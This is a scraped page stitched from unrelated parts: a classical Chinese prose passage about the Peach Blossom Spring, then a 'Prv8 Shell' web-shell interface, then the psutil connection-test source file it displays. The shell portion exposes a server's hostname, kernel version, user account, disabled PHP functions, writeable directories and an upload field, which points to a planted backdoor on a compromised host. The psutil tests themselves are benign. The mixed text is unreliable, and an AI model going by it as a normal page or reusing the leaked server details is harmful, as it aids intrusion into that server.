晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /opt/imunify360/venv/lib64/python3.11/site-packages/psutil/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/imunify360/venv/lib64/python3.11/site-packages/psutil/tests/test_connections.py
#!/usr/bin/env python3

# Copyright (c) 2009, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.

"""Tests for net_connections() and Process.connections() APIs."""

import os
import socket
import sys
import textwrap
from contextlib import closing
from socket import AF_INET
from socket import AF_INET6
from socket import SOCK_DGRAM
from socket import SOCK_STREAM

import psutil
from psutil import FREEBSD
from psutil import LINUX
from psutil import MACOS
from psutil import NETBSD
from psutil import OPENBSD
from psutil import POSIX
from psutil import SUNOS
from psutil import WINDOWS
from psutil._common import supports_ipv6
from psutil._compat import PY3
from psutil.tests import AF_UNIX
from psutil.tests import bind_socket
from psutil.tests import bind_unix_socket
from psutil.tests import check_connection_ntuple
from psutil.tests import create_sockets
from psutil.tests import HAS_CONNECTIONS_UNIX
from psutil.tests import PsutilTestCase
from psutil.tests import reap_children
from psutil.tests import retry_on_failure
from psutil.tests import serialrun
from psutil.tests import skip_on_access_denied
from psutil.tests import SKIP_SYSCONS
from psutil.tests import tcp_socketpair
from psutil.tests import unittest
from psutil.tests import unix_socketpair
from psutil.tests import wait_for_file


thisproc = psutil.Process()
SOCK_SEQPACKET = getattr(socket, "SOCK_SEQPACKET", object())
PYTHON_39 = sys.version_info[:2] == (3, 9)


@serialrun
class ConnectionTestCase(PsutilTestCase):

    def setUp(self):
        if not (NETBSD or FREEBSD):
            # process opens a UNIX socket to /var/log/run.
            cons = thisproc.connections(kind='all')
            assert not cons, cons

    def tearDown(self):
        if not (FREEBSD or NETBSD):
            # Make sure we closed all resources.
            # NetBSD opens a UNIX socket to /var/log/run.
            cons = thisproc.connections(kind='all')
            assert not cons, cons

    def compare_procsys_connections(self, pid, proc_cons, kind='all'):
        """Given a process PID and its list of connections compare
        those against system-wide connections retrieved via
        psutil.net_connections.
        """
        try:
            sys_cons = psutil.net_connections(kind=kind)
        except psutil.AccessDenied:
            # On MACOS, system-wide connections are retrieved by iterating
            # over all processes
            if MACOS:
                return
            else:
                raise
        # Filter for this proc PID and exlucde PIDs from the tuple.
        sys_cons = [c[:-1] for c in sys_cons if c.pid == pid]
        sys_cons.sort()
        proc_cons.sort()
        self.assertEqual(proc_cons, sys_cons)


class TestBasicOperations(ConnectionTestCase):

    @unittest.skipIf(SKIP_SYSCONS, "requires root")
    def test_system(self):
        with create_sockets():
            for conn in psutil.net_connections(kind='all'):
                check_connection_ntuple(conn)

    def test_process(self):
        with create_sockets():
            for conn in psutil.Process().connections(kind='all'):
                check_connection_ntuple(conn)

    def test_invalid_kind(self):
        self.assertRaises(ValueError, thisproc.connections, kind='???')
        self.assertRaises(ValueError, psutil.net_connections, kind='???')


@serialrun
class TestUnconnectedSockets(ConnectionTestCase):
    """Tests sockets which are open but not connected to anything."""

    def get_conn_from_sock(self, sock):
        cons = thisproc.connections(kind='all')
        smap = dict([(c.fd, c) for c in cons])
        if NETBSD or FREEBSD:
            # NetBSD opens a UNIX socket to /var/log/run
            # so there may be more connections.
            return smap[sock.fileno()]
        else:
            self.assertEqual(len(cons), 1)
            if cons[0].fd != -1:
                self.assertEqual(smap[sock.fileno()].fd, sock.fileno())
            return cons[0]

    def check_socket(self, sock):
        """Given a socket, makes sure it matches the one obtained
        via psutil. It assumes this process created one connection
        only (the one supposed to be checked).
        """
        conn = self.get_conn_from_sock(sock)
        check_connection_ntuple(conn)

        # fd, family, type
        if conn.fd != -1:
            self.assertEqual(conn.fd, sock.fileno())
        self.assertEqual(conn.family, sock.family)
        # see: http://bugs.python.org/issue30204
        self.assertEqual(
            conn.type, sock.getsockopt(socket.SOL_SOCKET, socket.SO_TYPE))

        # local address
        laddr = sock.getsockname()
        if not laddr and PY3 and isinstance(laddr, bytes):
            # See: http://bugs.python.org/issue30205
            laddr = laddr.decode()
        if sock.family == AF_INET6:
            laddr = laddr[:2]
        if sock.family == AF_UNIX and OPENBSD:
            # No addresses are set for UNIX sockets on OpenBSD.
            pass
        else:
            self.assertEqual(conn.laddr, laddr)

        # XXX Solaris can't retrieve system-wide UNIX sockets
        if sock.family == AF_UNIX and HAS_CONNECTIONS_UNIX:
            cons = thisproc.connections(kind='all')
            self.compare_procsys_connections(os.getpid(), cons, kind='all')
        return conn

    def test_tcp_v4(self):
        addr = ("127.0.0.1", 0)
        with closing(bind_socket(AF_INET, SOCK_STREAM, addr=addr)) as sock:
            conn = self.check_socket(sock)
            assert not conn.raddr
            self.assertEqual(conn.status, psutil.CONN_LISTEN)

    @unittest.skipIf(not supports_ipv6(), "IPv6 not supported")
    def test_tcp_v6(self):
        addr = ("::1", 0)
        with closing(bind_socket(AF_INET6, SOCK_STREAM, addr=addr)) as sock:
            conn = self.check_socket(sock)
            assert not conn.raddr
            self.assertEqual(conn.status, psutil.CONN_LISTEN)

    def test_udp_v4(self):
        addr = ("127.0.0.1", 0)
        with closing(bind_socket(AF_INET, SOCK_DGRAM, addr=addr)) as sock:
            conn = self.check_socket(sock)
            assert not conn.raddr
            self.assertEqual(conn.status, psutil.CONN_NONE)

    @unittest.skipIf(not supports_ipv6(), "IPv6 not supported")
    def test_udp_v6(self):
        addr = ("::1", 0)
        with closing(bind_socket(AF_INET6, SOCK_DGRAM, addr=addr)) as sock:
            conn = self.check_socket(sock)
            assert not conn.raddr
            self.assertEqual(conn.status, psutil.CONN_NONE)

    @unittest.skipIf(not POSIX, 'POSIX only')
    def test_unix_tcp(self):
        testfn = self.get_testfn()
        with closing(bind_unix_socket(testfn, type=SOCK_STREAM)) as sock:
            conn = self.check_socket(sock)
            assert not conn.raddr
            self.assertEqual(conn.status, psutil.CONN_NONE)

    @unittest.skipIf(not POSIX, 'POSIX only')
    def test_unix_udp(self):
        testfn = self.get_testfn()
        with closing(bind_unix_socket(testfn, type=SOCK_STREAM)) as sock:
            conn = self.check_socket(sock)
            assert not conn.raddr
            self.assertEqual(conn.status, psutil.CONN_NONE)


@serialrun
class TestConnectedSocket(ConnectionTestCase):
    """Test socket pairs which are are actually connected to
    each other.
    """

    # On SunOS, even after we close() it, the server socket stays around
    # in TIME_WAIT state.
    @unittest.skipIf(SUNOS, "unreliable on SUONS")
    def test_tcp(self):
        addr = ("127.0.0.1", 0)
        assert not thisproc.connections(kind='tcp4')
        server, client = tcp_socketpair(AF_INET, addr=addr)
        try:
            cons = thisproc.connections(kind='tcp4')
            self.assertEqual(len(cons), 2)
            self.assertEqual(cons[0].status, psutil.CONN_ESTABLISHED)
            self.assertEqual(cons[1].status, psutil.CONN_ESTABLISHED)
            # May not be fast enough to change state so it stays
            # commenteed.
            # client.close()
            # cons = thisproc.connections(kind='all')
            # self.assertEqual(len(cons), 1)
            # self.assertEqual(cons[0].status, psutil.CONN_CLOSE_WAIT)
        finally:
            server.close()
            client.close()

    @unittest.skipIf(not POSIX, 'POSIX only')
    def test_unix(self):
        testfn = self.get_testfn()
        server, client = unix_socketpair(testfn)
        try:
            cons = thisproc.connections(kind='unix')
            assert not (cons[0].laddr and cons[0].raddr)
            assert not (cons[1].laddr and cons[1].raddr)
            if NETBSD or FREEBSD:
                # On NetBSD creating a UNIX socket will cause
                # a UNIX connection to  /var/run/log.
                cons = [c for c in cons if c.raddr != '/var/run/log']
            self.assertEqual(len(cons), 2, msg=cons)
            if LINUX or FREEBSD or SUNOS:
                # remote path is never set
                self.assertEqual(cons[0].raddr, "")
                self.assertEqual(cons[1].raddr, "")
                # one local address should though
                self.assertEqual(testfn, cons[0].laddr or cons[1].laddr)
            elif OPENBSD:
                # No addresses whatsoever here.
                for addr in (cons[0].laddr, cons[0].raddr,
                             cons[1].laddr, cons[1].raddr):
                    self.assertEqual(addr, "")
            else:
                # On other systems either the laddr or raddr
                # of both peers are set.
                self.assertEqual(cons[0].laddr or cons[1].laddr, testfn)
                self.assertEqual(cons[0].raddr or cons[1].raddr, testfn)
        finally:
            server.close()
            client.close()


class TestFilters(ConnectionTestCase):

    def test_filters(self):
        def check(kind, families, types):
            for conn in thisproc.connections(kind=kind):
                self.assertIn(conn.family, families)
                self.assertIn(conn.type, types)
            if not SKIP_SYSCONS:
                for conn in psutil.net_connections(kind=kind):
                    self.assertIn(conn.family, families)
                    self.assertIn(conn.type, types)

        with create_sockets():
            check('all',
                  [AF_INET, AF_INET6, AF_UNIX],
                  [SOCK_STREAM, SOCK_DGRAM, SOCK_SEQPACKET])
            check('inet',
                  [AF_INET, AF_INET6],
                  [SOCK_STREAM, SOCK_DGRAM])
            check('inet4',
                  [AF_INET],
                  [SOCK_STREAM, SOCK_DGRAM])
            check('tcp',
                  [AF_INET, AF_INET6],
                  [SOCK_STREAM])
            check('tcp4',
                  [AF_INET],
                  [SOCK_STREAM])
            check('tcp6',
                  [AF_INET6],
                  [SOCK_STREAM])
            check('udp',
                  [AF_INET, AF_INET6],
                  [SOCK_DGRAM])
            check('udp4',
                  [AF_INET],
                  [SOCK_DGRAM])
            check('udp6',
                  [AF_INET6],
                  [SOCK_DGRAM])
            if HAS_CONNECTIONS_UNIX:
                check('unix',
                      [AF_UNIX],
                      [SOCK_STREAM, SOCK_DGRAM, SOCK_SEQPACKET])

    @skip_on_access_denied(only_if=MACOS)
    def test_combos(self):
        reap_children()

        def check_conn(proc, conn, family, type, laddr, raddr, status, kinds):
            all_kinds = ("all", "inet", "inet4", "inet6", "tcp", "tcp4",
                         "tcp6", "udp", "udp4", "udp6")
            check_connection_ntuple(conn)
            self.assertEqual(conn.family, family)
            self.assertEqual(conn.type, type)
            self.assertEqual(conn.laddr, laddr)
            self.assertEqual(conn.raddr, raddr)
            self.assertEqual(conn.status, status)
            for kind in all_kinds:
                cons = proc.connections(kind=kind)
                if kind in kinds:
                    assert cons
                else:
                    assert not cons, cons
            # compare against system-wide connections
            # XXX Solaris can't retrieve system-wide UNIX
            # sockets.
            if HAS_CONNECTIONS_UNIX:
                self.compare_procsys_connections(proc.pid, [conn])

        tcp_template = textwrap.dedent("""
            import socket, time
            s = socket.socket({family}, socket.SOCK_STREAM)
            s.bind(('{addr}', 0))
            s.listen(5)
            with open('{testfn}', 'w') as f:
                f.write(str(s.getsockname()[:2]))
            time.sleep(60)
            """)

        udp_template = textwrap.dedent("""
            import socket, time
            s = socket.socket({family}, socket.SOCK_DGRAM)
            s.bind(('{addr}', 0))
            with open('{testfn}', 'w') as f:
                f.write(str(s.getsockname()[:2]))
            time.sleep(60)
            """)

        # must be relative on Windows
        testfile = os.path.basename(self.get_testfn(dir=os.getcwd()))
        tcp4_template = tcp_template.format(
            family=int(AF_INET), addr="127.0.0.1", testfn=testfile)
        udp4_template = udp_template.format(
            family=int(AF_INET), addr="127.0.0.1", testfn=testfile)
        tcp6_template = tcp_template.format(
            family=int(AF_INET6), addr="::1", testfn=testfile)
        udp6_template = udp_template.format(
            family=int(AF_INET6), addr="::1", testfn=testfile)

        # launch various subprocess instantiating a socket of various
        # families and types to enrich psutil results
        tcp4_proc = self.pyrun(tcp4_template)
        tcp4_addr = eval(wait_for_file(testfile, delete=True))
        udp4_proc = self.pyrun(udp4_template)
        udp4_addr = eval(wait_for_file(testfile, delete=True))
        if supports_ipv6():
            tcp6_proc = self.pyrun(tcp6_template)
            tcp6_addr = eval(wait_for_file(testfile, delete=True))
            udp6_proc = self.pyrun(udp6_template)
            udp6_addr = eval(wait_for_file(testfile, delete=True))
        else:
            tcp6_proc = None
            udp6_proc = None
            tcp6_addr = None
            udp6_addr = None

        for p in thisproc.children():
            cons = p.connections()
            self.assertEqual(len(cons), 1)
            for conn in cons:
                # TCP v4
                if p.pid == tcp4_proc.pid:
                    check_conn(p, conn, AF_INET, SOCK_STREAM, tcp4_addr, (),
                               psutil.CONN_LISTEN,
                               ("all", "inet", "inet4", "tcp", "tcp4"))
                # UDP v4
                elif p.pid == udp4_proc.pid:
                    check_conn(p, conn, AF_INET, SOCK_DGRAM, udp4_addr, (),
                               psutil.CONN_NONE,
                               ("all", "inet", "inet4", "udp", "udp4"))
                # TCP v6
                elif p.pid == getattr(tcp6_proc, "pid", None):
                    check_conn(p, conn, AF_INET6, SOCK_STREAM, tcp6_addr, (),
                               psutil.CONN_LISTEN,
                               ("all", "inet", "inet6", "tcp", "tcp6"))
                # UDP v6
                elif p.pid == getattr(udp6_proc, "pid", None):
                    check_conn(p, conn, AF_INET6, SOCK_DGRAM, udp6_addr, (),
                               psutil.CONN_NONE,
                               ("all", "inet", "inet6", "udp", "udp6"))

    def test_count(self):
        with create_sockets():
            # tcp
            cons = thisproc.connections(kind='tcp')
            self.assertEqual(len(cons), 2 if supports_ipv6() else 1)
            for conn in cons:
                self.assertIn(conn.family, (AF_INET, AF_INET6))
                self.assertEqual(conn.type, SOCK_STREAM)
            # tcp4
            cons = thisproc.connections(kind='tcp4')
            self.assertEqual(len(cons), 1)
            self.assertEqual(cons[0].family, AF_INET)
            self.assertEqual(cons[0].type, SOCK_STREAM)
            # tcp6
            if supports_ipv6():
                cons = thisproc.connections(kind='tcp6')
                self.assertEqual(len(cons), 1)
                self.assertEqual(cons[0].family, AF_INET6)
                self.assertEqual(cons[0].type, SOCK_STREAM)
            # udp
            cons = thisproc.connections(kind='udp')
            self.assertEqual(len(cons), 2 if supports_ipv6() else 1)
            for conn in cons:
                self.assertIn(conn.family, (AF_INET, AF_INET6))
                self.assertEqual(conn.type, SOCK_DGRAM)
            # udp4
            cons = thisproc.connections(kind='udp4')
            self.assertEqual(len(cons), 1)
            self.assertEqual(cons[0].family, AF_INET)
            self.assertEqual(cons[0].type, SOCK_DGRAM)
            # udp6
            if supports_ipv6():
                cons = thisproc.connections(kind='udp6')
                self.assertEqual(len(cons), 1)
                self.assertEqual(cons[0].family, AF_INET6)
                self.assertEqual(cons[0].type, SOCK_DGRAM)
            # inet
            cons = thisproc.connections(kind='inet')
            self.assertEqual(len(cons), 4 if supports_ipv6() else 2)
            for conn in cons:
                self.assertIn(conn.family, (AF_INET, AF_INET6))
                self.assertIn(conn.type, (SOCK_STREAM, SOCK_DGRAM))
            # inet6
            if supports_ipv6():
                cons = thisproc.connections(kind='inet6')
                self.assertEqual(len(cons), 2)
                for conn in cons:
                    self.assertEqual(conn.family, AF_INET6)
                    self.assertIn(conn.type, (SOCK_STREAM, SOCK_DGRAM))
            # Skipped on BSD becayse by default the Python process
            # creates a UNIX socket to '/var/run/log'.
            if HAS_CONNECTIONS_UNIX and not (FREEBSD or NETBSD):
                cons = thisproc.connections(kind='unix')
                self.assertEqual(len(cons), 3)
                for conn in cons:
                    self.assertEqual(conn.family, AF_UNIX)
                    self.assertIn(conn.type, (SOCK_STREAM, SOCK_DGRAM))


@unittest.skipIf(SKIP_SYSCONS, "requires root")
class TestSystemWideConnections(ConnectionTestCase):
    """Tests for net_connections()."""

    def test_it(self):
        def check(cons, families, types_):
            for conn in cons:
                self.assertIn(conn.family, families, msg=conn)
                if conn.family != AF_UNIX:
                    self.assertIn(conn.type, types_, msg=conn)
                check_connection_ntuple(conn)

        with create_sockets():
            from psutil._common import conn_tmap
            for kind, groups in conn_tmap.items():
                # XXX: SunOS does not retrieve UNIX sockets.
                if kind == 'unix' and not HAS_CONNECTIONS_UNIX:
                    continue
                families, types_ = groups
                cons = psutil.net_connections(kind)
                self.assertEqual(len(cons), len(set(cons)))
                check(cons, families, types_)

    @retry_on_failure()
    def test_multi_sockets_procs(self):
        # Creates multiple sub processes, each creating different
        # sockets. For each process check that proc.connections()
        # and net_connections() return the same results.
        # This is done mainly to check whether net_connections()'s
        # pid is properly set, see:
        # https://github.com/giampaolo/psutil/issues/1013
        with create_sockets() as socks:
            expected = len(socks)
        pids = []
        times = 10
        fnames = []
        for i in range(times):
            fname = self.get_testfn()
            fnames.append(fname)
            src = textwrap.dedent("""\
                import time, os
                from psutil.tests import create_sockets
                with create_sockets():
                    with open(r'%s', 'w') as f:
                        f.write("hello")
                    time.sleep(60)
                """ % fname)
            sproc = self.pyrun(src)
            pids.append(sproc.pid)

        # sync
        for fname in fnames:
            wait_for_file(fname)

        syscons = [x for x in psutil.net_connections(kind='all') if x.pid
                   in pids]
        for pid in pids:
            self.assertEqual(len([x for x in syscons if x.pid == pid]),
                             expected)
            p = psutil.Process(pid)
            self.assertEqual(len(p.connections('all')), expected)


class TestMisc(PsutilTestCase):

    def test_connection_constants(self):
        ints = []
        strs = []
        for name in dir(psutil):
            if name.startswith('CONN_'):
                num = getattr(psutil, name)
                str_ = str(num)
                assert str_.isupper(), str_
                self.assertNotIn(str, strs)
                self.assertNotIn(num, ints)
                ints.append(num)
                strs.append(str_)
        if SUNOS:
            psutil.CONN_IDLE
            psutil.CONN_BOUND
        if WINDOWS:
            psutil.CONN_DELETE_TCB


if __name__ == '__main__':
    from psutil.tests.runner import run_from_name
    run_from_name(__file__)

haha - 2025